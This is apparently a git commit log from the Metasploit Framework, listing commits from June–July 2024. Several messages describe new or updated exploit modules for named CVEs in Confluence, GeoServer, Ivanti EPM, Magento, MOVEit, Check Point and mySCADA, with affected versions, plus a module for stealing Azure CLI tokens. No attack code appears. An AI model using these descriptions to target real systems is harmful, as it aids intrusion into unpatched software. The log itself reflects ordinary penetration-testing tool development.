2024-07-24 22:40:26 -04:00
h4x-x0r
c8feb5c5e6
Updated formatting
2024-07-24 22:40:00 -04:00
h4x-x0r
ddc13bc58f
Update modules/exploits/windows/scada/mypro_cmdexe.rb
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-07-24 20:52:40 -05:00
Jack Heysel
c05aebe248
Formatting
2024-07-24 11:16:26 -07:00
Jack Heysel
e9cbb9287c
Add support for 7.2.x
2024-07-24 10:45:38 -07:00
Metasploit
e505b9559c
automatic module_metadata_base.json update
2024-07-24 12:34:40 -05:00
adfoster-r7
8f472b9c61
Land #19338 , Kerberos asrep roasting improvements
2024-07-24 18:12:53 +01:00
adfoster-r7
89cf0223d1
Kerberos asrep roasting improvements
2024-07-24 18:01:11 +01:00
Zach Goldman
e0c6d1bddd
Land #19340 , Improve setg SessionLogging support
2024-07-24 12:44:27 -04:00
adfoster-r7
6a31ceb9e6
Improve setg SessionLogging support
2024-07-24 17:22:11 +01:00
adfoster-r7
771e7500a9
Land #19342 , Update msftidy logging for older modules
2024-07-24 17:13:43 +01:00
adfoster-r7
62a3f73e70
Update rubocop target ruby version
2024-07-24 16:47:17 +01:00
adfoster-r7
ed5c959fab
Update msftidy logging for older modules
2024-07-24 16:45:43 +01:00
Takah1ro
0f6e2a62b5
Fix numbering
2024-07-24 19:27:11 +09:00
Takah1ro
86ae938b1f
Add #
2024-07-24 18:55:52 +09:00
Takah1ro
b023ebfb7d
Add space at EOL
2024-07-24 18:51:23 +09:00
Takah1ro
dc60fe8025
Update skywalker.md
2024-07-24 18:49:09 +09:00
h4x-x0r
c1bf8df690
Updated the module to take advantage of the check method
2024-07-23 23:52:05 -04:00
h4x-x0r
9bfaf6343a
Updated the module to take advantage of the check method
2024-07-23 23:48:32 -04:00
Takah1ro
0fab915abb
Update to use original aes_encrypt function
2024-07-24 12:14:16 +09:00
Takah1ro
b48a2089cf
fix previous commit bug affecting original exploit
2024-07-24 11:55:05 +09:00
Takah1ro
79ad046f56
Refactoring skywalker
2024-07-24 11:42:19 +09:00
Takah1ro
eface45c5c
Refactoring skywalker
2024-07-24 10:19:03 +09:00
Takah1ro
ab0433e95f
Update to target both vulnerabilities
2024-07-23 22:21:08 +09:00
dwelch-r7
c4fd2faa3b
Land #19339 , Update ffi pin version
2024-07-23 13:48:36 +01:00
adfoster-r7
7348f550c4
Update ffi pin version
2024-07-23 13:30:25 +01:00
Takah1ro
61754f3c92
Add cve ref and update broken link
2024-07-23 08:43:45 +09:00
h4x-x0r
d7e50cb126
mySCADA MyPRO <= v8.28.0 Command Injection (CVE-2023-28384) exploit module
2024-07-22 16:49:40 -04:00
h4x-x0r
2bdba1a48d
Documentation for the MyPRO Command Injection (CVE-2023-28384) Module.
2024-07-22 16:46:37 -04:00
Simon Janusz
1108afb5cb
Land #19336 , Fix SSH scanner tests when report summary enabled
2024-07-22 15:42:49 +01:00
adfoster-r7
ba52331421
Fix SSH scanner tests when report summary enabled
2024-07-22 11:22:22 +01:00
Takahiro Yokoyama
a18ce36459
Update empire_skywalker.md
2024-07-21 09:36:45 +09:00
h00die-gr3y
b65c7ecb08
added support for all openmediavault versions (0.1 - 7.4.2-2)
2024-07-20 20:55:33 +00:00
Takahiro Yokoyama
ad82481cce
Update empire_skywalker.rb
2024-07-20 21:55:39 +09:00
Takahiro Yokoyama
48ea314138
Update empire_skywalker.md
2024-07-20 14:44:15 +09:00
Takahiro Yokoyama
ec45763f05
Add empire_skywalker module documentation
2024-07-20 14:10:00 +09:00
Jack Heysel
e6f2352248
WIP
2024-07-19 14:43:13 -07:00
Metasploit
db5ace8c5f
automatic module_metadata_base.json update
2024-07-19 12:55:31 -05:00
bwatters
636c72965c
Land #19084 , Add CVE-2022-1373 and CVE-2022-2334 exploit chain
...
Merge branch 'land-19084' into upstream-master
2024-07-19 12:22:25 -05:00
bwatters
1881d4e8b4
commit and sign binary
2024-07-19 12:07:59 -05:00
Metasploit
ea868b164c
automatic module_metadata_base.json update
2024-07-19 11:42:11 -05:00
bwatters
9b7b1fd16e
Land #19313 , Ghostscript Command Execution via Format String (CVE-2024-29510)
...
Merge branch 'land-19313' into upstream-master
2024-07-19 11:24:11 -05:00
Christophe De La Fuente
4d485acb73
Remove Windows target since it doesn't work for now
2024-07-19 16:19:56 +02:00
redwaysecurity.com
dc282f5cc4
Cleanup
2024-07-19 12:38:50 +02:00
redwaysecurity.com
117c2b9298
feat: Allow explicit SSL configuration in start_service method
...
The start_service method now allows users to specify their SSL preferences directly through the opts parameter. If the ssl option is not provided in opts, it will default to the value in datastore['SSL'].
This change enhances the flexibility and usability of the start_service method, preventing unintended behavior when users need to control the SSL setting explicitly.
Closes #19329
2024-07-19 12:33:13 +02:00
Metasploit
b5d89f3e11
automatic module_metadata_base.json update
2024-07-18 12:56:01 -05:00
Jack Heysel
6ad5ba36fd
Land #19304 , Add Magento XXE File Read Exploit
...
This adds an auxiliary module for an XXE which results in an arbirary
file in Magento which is being tracked as CVE-2024-34102
2024-07-18 10:32:03 -07:00
jheysel-r7
53afe2b28f
Updated SRVHOST description in doc file
2024-07-18 12:44:06 -04:00
redwaysecurity.com
d559a74c1d
Removed dead code
2024-07-18 11:56:22 +02:00
redwaysecurity.com
5d9232cc39
It must fails on SRVHOST default configuration.
...
If srvhost is set to 0.0.0.0 the framework will attempt to automatically
set it to your default LHOST although that isn't always accessible by your
target.
2024-07-18 11:15:04 +02:00
Metasploit
219abdd9c6
Bump version of framework to 6.4.19
2024-07-18 03:33:57 -05:00
Metasploit
caddd1b434
automatic module_metadata_base.json update
2024-07-18 02:08:59 -05:00
Spencer McIntyre
5886e69e92
Land #19327 , Bump metasploit_payloads-mettle to 1.0.31
...
Bump metasploit_payloads-mettle to 1.0.31
2024-07-18 08:43:41 +02:00
Heyder Andrade
55e825bdca
Update modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-07-18 07:36:48 +02:00
Heyder Andrade
400e628226
Update modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-07-18 07:36:24 +02:00
redwaysecurity.com
a5208e0c5f
Moved module to auxiliary/gather
2024-07-17 18:47:02 +02:00
redwaysecurity.com
5e693dcbe7
Fix typo
2024-07-17 18:14:03 +02:00
redwaysecurity.com
236662ce37
Changed CheckCode returned value
...
As we're checking the version and not actually exploiting the vulnerability the check method should return CheckCode::Appears
2024-07-17 18:11:55 +02:00
redwaysecurity.com
8b9b8a2cf0
Gives the user a datastore option
...
The user can decide whether or not they want the loot to be stored on disk or printed to the console.
2024-07-17 18:09:46 +02:00
redwaysecurity.com
07c1d818a8
Cleaning dead code and addeding default case
2024-07-17 17:14:03 +02:00
redwaysecurity.com
16fefd9942
Turning off SSL datastore temporarily.
...
Briefly disable the SSL datastore option before starting the HTTP server to avoid spinning up an HTTPS server, which would cause the exploit to fail.
2024-07-17 16:44:50 +02:00
redwaysecurity.com
08de13fe01
Converting the version string
...
The version string needs to be converted to a Rex::Version object in order for the two values to be compared successfully.
2024-07-17 16:13:32 +02:00
h00die-gr3y
5459503dc6
updated module reference of openmediavault_cmd_exec
2024-07-16 16:04:14 +00:00
h00die-gr3y
a9f8475bf5
moved module + doc to exploit/unix/webapp
2024-07-16 15:50:20 +00:00
dledda-r7
2dfe97673a
Bump metasploit_payloads-mettle to 1.0.31
2024-07-16 11:47:14 -04:00
Christophe De La Fuente
e9c511c979
Add documentation and some updates
2024-07-16 16:34:28 +02:00
Metasploit
6db63e80a8
automatic module_metadata_base.json update
2024-07-16 08:28:57 -05:00
adfoster-r7
2943f01d22
Land #19325 , update geoserver_unauth_rce_cve_2024_36401
2024-07-16 14:06:20 +01:00
redwaysecurity.com
54a7ed1cfb
Added check method
...
Signed-off-by: redwaysecurity.com <heyder@redwaysecurity.com >
2024-07-16 13:31:24 +02:00
redwaysecurity.com
173a244718
Added documentation
...
Signed-off-by: redwaysecurity.com <heyder@redwaysecurity.com >
2024-07-16 13:17:49 +02:00
Pierre Mauduit
8a0c65e603
Update geoserver_unauth_rce_cve_2024_36401.rb
...
looks like a copy/paste typo from another exploit
2024-07-16 11:20:35 +02:00
Jack Heysel
cfd71e9c27
Land #19324 , Add improvements to rcp_session lib
...
Updates rpc compatible modules to handle unknown sessions
2024-07-15 14:25:57 -07:00
Metasploit
0e7b9d3107
automatic module_metadata_base.json update
2024-07-15 08:27:29 -05:00
Spencer McIntyre
882a283ea9
Land #19322 , Bump metasploit_payloads-mettle to 1.0.30
...
Bump metasploit_payloads-mettle to 1.0.30
2024-07-15 09:02:39 -04:00
adfoster-r7
604227fb4d
Update rpc compatible modules to handle unknown sessions
2024-07-15 10:38:56 +01:00
Metasploit
1abe29e98c
automatic module_metadata_base.json update
2024-07-12 13:31:47 -05:00
Jack Heysel
f7449ea850
Land #19311 , Add GeoServer unauth RCE module
...
This adds an exploit module for CVE-2024-36401, an unauthenticated RCE
vulnerability in GeoServer versions prior to 2.23.6, between version
2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1.
2024-07-12 11:07:36 -07:00
jheysel-r7
c5dad68322
Remove comma after the last item of a hash
2024-07-12 13:38:59 -04:00
H00die.Gr3y
292c177b74
Apply suggestions from code review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-07-12 19:20:46 +02:00
h00die
07cc3bbf74
Further updates to x11
2024-07-12 13:57:24 +00:00
h00die
a93a6dddf9
Merge branch 'rapid7:master' into xspy
2024-07-12 06:49:52 -04:00
dledda-r7
5d1ee84cb0
Bump metasploit_payloads-mettle to 1.0.30
2024-07-12 05:17:19 -04:00
Jack Heysel
5d210b548b
added windows support
2024-07-11 16:34:07 -07:00
h00die-gr3y
4e76068cea
added armle architecture support
2024-07-11 21:42:45 +00:00
h00die-gr3y
92f6445856
added documentation
2024-07-11 21:24:50 +00:00
h00die
04f4990318
Further x11 updates
2024-07-11 18:28:50 +00:00
h00die-gr3y
1ee2131d8d
update based on cgranleese-r7 review comments
2024-07-11 16:12:52 +00:00
h00die
ea0d400e79
update x11 docs
2024-07-11 12:35:38 +00:00
h00die
05fb1d3eaa
x11 library update
2024-07-11 12:34:49 +00:00
Metasploit
6283456164
Bump version of framework to 6.4.18
2024-07-11 03:34:02 -05:00
Metasploit
8849329d65
automatic module_metadata_base.json update
2024-07-10 20:50:17 -05:00
Jack Heysel
daf0ce90f0
Land #19314 , Add exploit for CVE-2024-21683
...
This adds an exploit for CVE-2024-21638 which is an authenticated RCE in
Atlassian Confluence affecting all versions prior to 7.17 and many
versions up to 8.9.0
2024-07-10 18:26:04 -07:00
jheysel-r7
f9bd079618
Apply suggestions from code review
2024-07-10 20:45:53 -04:00
h00die-gr3y
28d6ef92dd
fourth release module
2024-07-10 21:44:28 +00:00
dwelch-r7
41dee56152
Land #19319 , Pin FFI version
2024-07-10 16:06:38 +01:00
adfoster-r7
9c14536e08
Pin FFI version
2024-07-10 15:08:00 +01:00
h00die-gr3y
198f3f8d9b
update based on review comments of jvoisin
2024-07-10 11:05:22 +00:00
adfoster-r7
dd0cf4baae
Land #19315 , remove duplicate word in wiki docs
2024-07-10 00:03:03 +01:00
h00die
74536b93d6
remove duplicate word
2024-07-09 18:02:31 -04:00
h00die-gr3y
92637c4293
third release module
2024-07-09 21:54:55 +00:00
remmons-r7
7746c8877e
Add sysinfo Meterpreter output and target OS version numbers
2024-07-09 16:31:01 -05:00
remmons-r7
108e60ae4d
Peer review suggestion to swap out fail_with for print_error
...
If the response to the code execution request isn't a 200, the module should error instead of fail. All versions tested returned 200s, but it's a great point that some Confluence versions might return a different status code but still pop a shell.
2024-07-09 16:23:25 -05:00
remmons-r7
abb02a91d5
Add suggested Appears/Safe change from peer review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-07-09 16:16:41 -05:00
remmons-r7
0852fbfeb8
Remove two whitespaces that snuck in
2024-07-09 14:34:33 -05:00
remmons-r7
8ee90bf2c7
Adding module for CVE-2024-21683
...
This adds a module to exploit an authenticated admin-level Rhino script engine injection vulnerability for RCE in Atlassian Confluence.
2024-07-09 14:19:15 -05:00
remmons-r7
06da60cade
Adding atlassian_confluence_rce_cve_2024_21683 documentation
...
Adding CVE-2024-21683 documentation, which includes both Windows and Linux examples.
2024-07-09 14:05:43 -05:00
Christophe De La Fuente
1abc42a873
Add module
2024-07-09 18:34:27 +02:00
adfoster-r7
745bb9caa7
Land #19301 , Update setting up a developer environment documentation
2024-07-09 14:09:50 +01:00
Arne De Herdt
cbdbb8e5ac
Update docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-07-09 13:27:06 +02:00
adeherdt-r7
1112ab5f64
MS-9451 Update Documentation
...
Updating the documentation to set up the developer environment using Docker.
2024-07-09 09:25:02 +02:00
Metasploit
7ad7b959ec
automatic module_metadata_base.json update
2024-07-08 15:08:56 -05:00
Jack Heysel
aabd9febb2
Land #19274 , Ivanti EPM SQLi to RCE
...
This adds an exploit for CVE-2024-29824, an unauthenticated SQLi
which can be used to obtain RCE in Ivanti Endpoint Manager 2022 SU5 and
prior
2024-07-08 12:52:34 -07:00
h00die-gr3y
702aff81ce
second release module
2024-07-08 19:35:34 +00:00
Metasploit
39cc7437d7
automatic module_metadata_base.json update
2024-07-08 10:29:44 -05:00
Zach Goldman
e0ccd8a040
Land #19312 , Fix loading Mettle extensions
2024-07-08 11:05:12 -04:00
adfoster-r7
50142ff988
Fix loading Mettle extensions
2024-07-08 14:04:13 +01:00
h00die-gr3y
8e598acaeb
first draft release
2024-07-08 06:53:16 +00:00
h00die-gr3y
2e1dfa62c1
One small change in check method
2024-07-05 06:55:37 +00:00
h00die-gr3y
7ad152694a
Addressed two more review comments
2024-07-04 20:49:17 +00:00
h00die-gr3y
594de4681f
Second release module addressing cdelafuente-r7 comments and added documentation
2024-07-04 20:31:02 +00:00
redwaysecurity.com
d89df446bf
WIP - added module for CVE-2024-34102
...
on-behalf-of: @redwaysecurity info@redwaysecurity.com
2024-07-04 16:24:39 +02:00
Metasploit
e549e0ccf4
Bump version of framework to 6.4.17
2024-07-04 03:37:24 -05:00
dledda-r7
f7902c2826
Land #19295 , MOVEit Transfer SFTP auth bypass
2024-07-04 04:27:50 -04:00
Metasploit
cc46ad7ddd
automatic module_metadata_base.json update
2024-07-03 13:47:21 -05:00
adfoster-r7
4909a43bf0
Land #19252 , improve error handling for unhandled errors
2024-07-03 19:20:56 +01:00
Christophe De La Fuente
df8f281d18
Land #19204 , Zyxel VPN Series Pre-auth Command Injection
2024-07-03 20:14:39 +02:00
jheysel-r7
b67f05f50d
Apply suggestions from code review
2024-07-03 13:51:50 -04:00
Jack Heysel
7e4c6ca028
Added code to print stdout of payloads without reverse connections
2024-07-03 09:36:36 -07:00
sfewer-r7
cb3966da7f
reduce the nesting in read_file by 2 levels
2024-07-03 17:12:03 +01:00
Metasploit
29beac7f8c
automatic module_metadata_base.json update
2024-07-03 10:54:49 -05:00
sfewer-r7
4ca2ce35eb
use synchronous calls to open, read and close (as the async calls were not being waited on, so moving to the sync implmentations of these avoids that problem), thanks @cdelafuente-r7 :)
2024-07-03 16:38:31 +01:00
sfewer-r7
0b6d3057ca
fix typos in comments
2024-07-03 16:36:15 +01:00
dledda-r7
1e0db9ec83
Land #10113 , Azure CLI steal tokens post module.
2024-07-03 11:32:04 -04:00
Jack Heysel
1d602da6b5
Added space between command and stderr/stout redirection
2024-07-03 08:23:38 -07:00
sfewer-r7
9d5ea1f2b7
call sftp.close in an ensure block in case seomthing throws an excpetion. we probably dont *have* to do this (as teh SFTP session will be torn down either way), but it seems like best practise *to* so this.
2024-07-03 16:21:42 +01:00
sfewer-r7
e1916974a1
we can use glob rather than foreach to recursivly list the contents of a folder
2024-07-03 16:20:27 +01:00
Zach Goldman
4316d52b87
trim exception list
2024-07-03 09:48:27 -05:00
sfewer-r7
a55ee563c7
update LICENSE_GEMS to include the MIT license for net/sftp
2024-07-03 11:15:18 +01:00
sfewer-r7
ee960d2b5b
I noticed some tests are failing on gitHub, looks like I need to update the Gemfile.lock, as the library net/sftp was added for this auxiliary module
2024-07-03 11:03:19 +01:00
Stephen Fewer
840da8d181
explicitly register an Opt::Proxies option
...
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-07-03 10:45:45 +01:00
Christophe De La Fuente
1264fe40ad
Land #19285 , Fix sysinfo fails when cwd in the implant is deleted
2024-07-02 18:57:50 +02:00
sfewer-r7
8422b4cf39
add in support to net/sftp for Metasploits pivot system, by using a new Rex::Socket::Tcp socket when creating the underlying SSH protocols socket.
2024-07-02 16:09:25 +01:00
dledda-r7
aa4529596c
fix: minor fix; removing a blank line
2024-07-02 11:09:13 -04:00
sfewer-r7
ec32b76904
The RPORT we register as an option should be 22, not 80. We can also remove the DefaultOptions, RPORT is covered and SSL does not make sense here.
2024-07-02 15:55:09 +01:00
h00die-gr3y
562e93fe3b
First release module
2024-07-02 14:54:04 +00:00
adfoster-r7
2b6cf16b39
Land #19297 , improve redis scanner logic to handle no auth scenario
2024-07-02 13:46:01 +01:00
adeherdt-r7
c5717d42d6
MS-9457 Support NO_AUTH_REQUIRED
...
Support the `NO_AUTH_REQUIRED` condition and terminate the scan to avoid further unneeded attempts.
2024-07-02 14:09:01 +02:00
Zach Goldman
eb81a786d1
replace uri unescape with new proper methods
2024-07-01 15:52:01 -05:00
sfewer-r7
0d7efcaabc
add in AKB analysis link and fix some typos
2024-07-01 09:25:19 +01:00
Metasploit
27a63aa68d
automatic module_metadata_base.json update
2024-06-28 10:27:03 -05:00
adfoster-r7
90ef017cfb
Land #19289 , Update apache_nifi_credentials algo regex
2024-06-28 15:59:24 +01:00
dwelch-r7
dc667dc67f
Land #19287 , Add login support for newer redis versions
2024-06-28 15:47:39 +01:00
h00die
eb0933fc9a
Update apache_nifi_credentials algo regex
2024-06-28 10:36:35 -04:00
adeherdt-r7
52142f280f
MS-9454 Redis Scanner: Support versions
...
Updating the Redis Login Scanner to properly support all versions of Redis and their implementations to handle the `AUTH` command.
2024-06-28 15:25:49 +02:00
dledda-r7
f92ebb34ca
fix: moved begin/rescue inside the update_session_info; added logging
2024-06-28 03:21:42 -04:00
h00die
db0f11bfe4
Update azure_cli_creds.md
2024-06-27 10:45:42 -04:00
h00die
6dc1b6a6e4
fix slashes for linux on azure_cli
2024-06-27 10:45:05 -04:00
Metasploit
e691f72170
Bump version of framework to 6.4.16
2024-06-27 03:34:27 -05:00
sfewer-r7
aff9e07f1f
add in the aux gather module for CVE-2024-5806
2024-06-27 09:32:47 +01:00
sfewer-r7
493a45e0ba
add in net-sftp as a required Gem, we need this to exploit CVE-2024-5806
2024-06-27 09:32:15 +01:00
adfoster-r7
9343a35f00
Land #19283 , MS-9445 Fix Redis Service Reporting
2024-06-26 16:10:31 +01:00
dledda-r7
0659232e8f
fix: fixed sysinfo fails when cwd in the implant is deleted
2024-06-26 09:16:22 -04:00
adeherdt-r7
51176e778c
MS-9445 Fix Service Reporting
...
Preliminary pull request to resolve an issue with a service not being properly detected for Redis.
* Ensure service name is properly passed down when detecting vulnerabilities
* Ensure Redis properly detects no-auth requirements
2024-06-26 15:11:29 +02:00
Arne De Herdt
580e7fff4d
Merge pull request #19284 from adfoster-r7/fix-redis-scanner-when-auth-enabled
...
Fix redis_login scanner when auth is enabled
2024-06-26 14:52:21 +02:00
adfoster-r7
afa973e05e
Fix reids_login scanner when auth is enabled
2024-06-26 13:32:16 +01:00
Metasploit
4c81b39d76
automatic module_metadata_base.json update
2024-06-24 18:09:00 -05:00
Spencer McIntyre
a5afdd6e04
Land #19205 , Add MS-NRPC users enumeration module
2024-06-24 18:52:47 -04:00
Spencer McIntyre
858a2f8400
Fix rubocop issues
2024-06-24 18:21:49 -04:00
Spencer McIntyre
3794285715
Bump RubySMB to 3.3.9
2024-06-24 18:21:45 -04:00
h00die
b4975f6a23
updates to azure cli creds
2024-06-24 17:06:04 -04:00
Jack Heysel
9cfaa2e69f
Lowered rank and explained mock testing
2024-06-24 09:13:46 -07:00
Metasploit
be11394758
automatic module_metadata_base.json update
2024-06-24 08:26:23 -05:00
Spencer McIntyre
dc2adc0798
Land #19259 , warn on weak meterpreter keys
...
Fixing meterpreter to support is_weak_key byte flag from mettle
2024-06-24 08:58:40 -04:00
Metasploit
f26393256b
automatic module_metadata_base.json update
2024-06-24 07:06:04 -05:00
Christophe De La Fuente
24fa34e7b9
Land #19188 , Netis MW5360 unauthenticated RCE [CVE-2024-22729]
2024-06-24 13:40:51 +02:00
dledda-r7
09debbb93f
fix: fixed rubocop issue
2024-06-24 05:33:30 -04:00
dledda-r7
2de112891c
fix: fixed payload cached size
2024-06-24 05:21:07 -04:00
dledda-r7
91f4741508
Update metasploit_payloads-mettle gem to 1.0.28
2024-06-21 11:14:33 -04:00
dwelch-r7
b4c2abad5f
Land #19275 , Add adeherdt-r7 to the mail map
2024-06-21 14:22:14 +01:00
adeherdt-r7
8b5c8bcb3a
Add adeherdt-r7 to the mail map
...
Updating the mailmap.
2024-06-21 15:14:34 +02:00
Christophe De La Fuente
2f238fcd24
Code review
2024-06-21 10:13:08 +02:00
dledda-r7
8a432fb292
fix: default is_weak_key is nil; handling of empty key_dec_data
2024-06-21 04:00:02 -04:00
Christophe De La Fuente
ecb628eaab
Add module and documentation
2024-06-20 15:30:54 +02:00
adfoster-r7
db94ad16d6
Land #19270 , Update Github runners
2024-06-20 11:22:09 +01:00
Metasploit
b710bcb10a
automatic module_metadata_base.json update
2024-06-20 05:06:23 -05:00
adfoster-r7
2e51b37f1c
Land #19267 , Escape LDAP query string filters
2024-06-20 10:42:19 +01:00
Metasploit
bccad774fd
Bump version of framework to 6.4.15
2024-06-20 03:37:28 -05:00
adfoster-r7
3f39b09211
Update Github runners
2024-06-20 00:11:12 +01:00
Metasploit
03a2aea099
automatic module_metadata_base.json update
2024-06-19 13:11:17 -05:00
Jack Heysel
bae70a4b98
Land #19255 , Add SolarWinds Serv-U aux module
...
This module exploits an unauthenticated file read vulnerability, due to
directory traversal, affecting SolarWinds Serv-U FTP Server 15.4, Serv-U
Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to the
vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are
affected.
2024-06-19 10:54:45 -07:00
jheysel-r7
06c0c7392f
Rubocop add space after comma
2024-06-19 13:20:52 -04:00
jheysel-r7
fd9c74766d
Update Windows TARGETFILE matching
2024-06-19 13:15:35 -04:00
Spencer McIntyre
a6fd6defcb
Escape LDAP query strings
2024-06-18 17:47:56 -04:00
Metasploit
5f68d93809
automatic module_metadata_base.json update
2024-06-18 16:25:03 -05:00
Spencer McIntyre
08575d0895
Land #19176 , Add missing Arch parameter
...
Adding Arch parameter to dnn_cookie_deserialization_rce module
2024-06-18 17:07:08 -04:00
Metasploit
5992dcebc1
automatic module_metadata_base.json update
2024-06-18 15:09:54 -05:00
Spencer McIntyre
0110ed2b2a
Land #19253 , Corrected a mistaken CVE
...
Corrected a mistaken CVE-ID in exploit references.
2024-06-18 15:52:55 -04:00
aaron
94dca16cf7
Removing change from auto-generated file. Change is now ONLY in module file.
2024-06-18 15:16:56 -04:00
Metasploit
3c75e3c891
automatic module_metadata_base.json update
2024-06-18 12:09:04 -05:00
Jack Heysel
c1826cd2f3
Land #18829 , Allow multiple HttpServers in module
...
Adding multiple HttpServer services in a module is sometimes complex
since they share the same methods. This usually this causes issues where
on_request_uri needs to be overridden to handle requests coming from
each service. This updates the cmdstager and the Java HTTP ClassLoader
mixins, since these are commonly used in the same module. This also
updates the manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module
to make use of these new changes
2024-06-18 09:51:38 -07:00
sud0Ru
5ec4f25e95
Class variable changed back to an instance variable
2024-06-18 17:57:54 +03:00
sud0Ru
03a1aee487
Delete old module
2024-06-18 17:53:32 +03:00
sud0Ru
a5a296aef7
Delete old documentation file
2024-06-18 17:52:33 +03:00
Spencer McIntyre
29307b1321
Appease msftidy
2024-06-18 09:23:41 -04:00
Metasploit
223c6feadb
automatic module_metadata_base.json update
2024-06-17 13:45:05 -05:00
Jack Heysel
dc70aa0896
Land #19247 , PHP CGI Arg injection RCE
...
XAMPP installs running on Windows system configured to use Japanese or
Chinese (simplified or traditional) locales are vulnerable to a PHP CGI
argument injection vulnerability. This exploit module returns a session
running in the context of the Administrator user
2024-06-17 11:27:38 -07:00
Metasploit
e412f95116
automatic module_metadata_base.json update
2024-06-17 10:39:13 -05:00
Spencer McIntyre
818d67b3ee
Land #19249 , Apache OFBiz Directory Traversal RCE
...
Apache OFBiz Directory Traversal RCE [CVE-2024-32113]
2024-06-17 11:22:44 -04:00
dledda-r7
80e942b76d
fix: better implementation of negotiate_tlv_encryption
2024-06-17 10:57:17 -04:00
Metasploit
e2516bd494
automatic module_metadata_base.json update
2024-06-17 04:39:30 -05:00
dwelch-r7
17a6d443b5
Land #19260 , Update windows acceptance tests
2024-06-17 10:19:25 +01:00
dwelch-r7
39de7ca357
Land #19257 , Update docs ruby version
2024-06-17 10:17:40 +01:00
h00die
db338e364c
fix consolehost_history search
2024-06-16 20:33:18 -04:00
h00die
434455757d
tested azure_cli_creds against data files
2024-06-16 20:25:47 -04:00
Jack Heysel
e14dd93d6f
Rebased encoder fix, removed PS paylaod dependency
2024-06-14 16:59:55 -07:00
Jack Heysel
ade11a5a4b
Added default options fixed Verification Steps
2024-06-14 16:41:12 -07:00
Jack Heysel
1dfd5da51e
Apache OFBiz Dir Traversal RCE
2024-06-14 16:41:12 -07:00
Metasploit
b6d2fb654b
automatic module_metadata_base.json update
2024-06-14 17:59:00 -05:00
Jack Heysel
90bb6b9b01
Land #19261 , Fix powershell_base64 encoder
...
The powershell_base64 encoder was changed to use the Windows start
command, which broke some payload after they were encoded. This was
because when using start, the argument can not be a string of commands
joined by & which is required by the fetch payloads. This fixes that
issue by removing the start command from the encoder
2024-06-14 15:41:22 -07:00
Metasploit
c8dc3ed661
automatic module_metadata_base.json update
2024-06-14 13:51:49 -05:00
Jack Heysel
178bb3e085
Land #19229 , Junos OS PHPRC module enhancement
...
The junos_phprc_auto_prepend_file module used to depend on having a user
authenticated to the J-Web application to steal the necessary session
tokens in order to exploit. With this enhancement the module will now
create a session if one doesnt exist. Also it adds datastore options to
change the hash format to be compatible with older version as well an
option to attempt to set ssh root login to true before attempting to
establish a root ssh session
2024-06-14 11:35:15 -07:00
Jack Heysel
1bb95acd12
Updated documentation
2024-06-14 11:02:31 -07:00
dledda-r7
1a8746f076
fix: updated warning messages, inverted is_weak_key logic
2024-06-14 10:19:56 -04:00
Christophe De La Fuente
8fc6e20cec
Update other modules to use java_class_loader_start_service and cmdstager_start_service
2024-06-14 12:57:42 +02:00
softScheck
d68a57f649
junos_ssh_jail: replaced asdf with alphanumeric random string
2024-06-14 10:45:19 +02:00
softScheck
0a34168906
junos_ssh_jail: revert to old get_csrf_token method with securephpsessid added
2024-06-14 10:38:24 +02:00
Spencer McIntyre
111d329609
Fix the powershell_base64 encoder
2024-06-13 15:46:02 -04:00
Metasploit
de3e92957c
automatic module_metadata_base.json update
2024-06-13 13:29:14 -05:00
Jack Heysel
35d161be91
Land #19221 , CheckPoint Security Gateway file read
...
This module leverages an unauthenticated arbitrary root file read
vulnerability for Check Point Security Gateway appliances. When the
IPSec VPN or Mobile Access blades are enabled on affected devices,
traversal payloads can be used to read any files on the local file
system. This vulnerability is tracked as CVE-2024-24919.
2024-06-13 11:03:58 -07:00
adfoster-r7
30c9ea2064
Update windows acceptance tests
2024-06-13 18:05:30 +01:00
Jack Heysel
1abe3b9a26
Add detail to setup instructions
2024-06-13 08:57:24 -07:00
Christophe De La Fuente
70b21ff3f2
Update manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module
2024-06-13 16:53:07 +02:00
Christophe De La Fuente
764dc89997
Update Java::HTTP::ClassLoader and CmdStager::HTTP
...
- Add specific #on_request_uri, #start_service and #resource_uri methods with distinct names
2024-06-13 16:39:24 +02:00
Stephen Fewer
b98e0b8cfc
STORE_LOOT is OptBool, so will be either true or false, we can remove equality check here.
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-06-13 15:13:53 +01:00
Stephen Fewer
fb44c7e6ff
fix typo in module description
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-06-13 15:10:14 +01:00
Stephen Fewer
d7531ef74c
fix typo in documentation
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-06-13 15:09:56 +01:00
dledda-r7
acfaf52611
feat(meterpreter): display a warning when a weak encryption aes_key is used. skip module loading if encryption is weak.
2024-06-13 09:30:17 -04:00
remmons-r7
297cbb2e8e
Single quotes to double quotes for string interpolation
...
Secondary commit from peer review suggestion.
2024-06-13 08:14:35 -05:00
remmons-r7
c7d40bc6f1
Updating language around file in documentation
...
From peer review suggestion.
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-06-13 08:08:09 -05:00
remmons-r7
dc028fdb1e
Enable SSL by default
...
From peer review suggestion.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-06-13 08:07:18 -05:00
remmons-r7
eb51d7be45
Change Failure::Unknown to Failure::UnexpectedReply
...
From peer review suggestion.
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-06-13 08:06:25 -05:00
dwelch-r7
906a3486dc
Land #19258 , Update linting Ruby version
2024-06-13 13:31:59 +01:00
adfoster-r7
f8eba7c1d9
Update linting Ruby version
